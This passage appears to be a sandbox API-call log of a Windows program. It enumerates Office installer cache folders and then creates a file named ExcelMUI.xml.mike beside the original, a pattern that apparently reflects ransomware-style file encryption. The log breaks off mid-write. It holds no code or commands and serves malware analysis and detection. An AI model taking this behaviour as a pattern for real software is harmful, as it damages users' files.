lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0039.567] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0039.567] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0039.568] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0039.568] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0039.568] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0039.568] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0039.568] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.569] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.570] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.570] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0039.570] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0039.570] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0039.571] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0039.571] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0039.571] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0039.571] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0039.571] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0039.571] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0039.571] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0039.571] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0039.572] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0039.572] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0039.572] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0039.572] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0039.572] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0039.572] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0039.572] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.572] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.573] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.573] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.573] CoTaskMemFree (pv=0x4fe370) [0039.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0039.574] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.611] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.611] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0039.612] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0039.612] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0039.612] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0039.612] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.612] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0039.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0039.612] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.639] GetFileType (hFile=0x264) returned 0x1 [0039.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0039.639] GetFileType (hFile=0x264) returned 0x1 [0039.639] CloseHandle (hObject=0x264) returned 1 [0039.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0039.639] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0039.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.640] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21923d4 | out: lpFileInformation=0x21923d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d)) returned 1 [0039.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.640] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2192700 | out: lpFileInformation=0x2192700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d)) returned 1 [0039.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.640] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0039.640] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0039.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0039.641] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.648] GetFileType (hFile=0x264) returned 0x1 [0039.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0039.648] GetFileType (hFile=0x264) returned 0x1 [0039.648] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0039.648] WriteFile (in: hFile=0x264, lpBuffer=0x21935f0*, nNumberOfBytesToWrite=0x220, 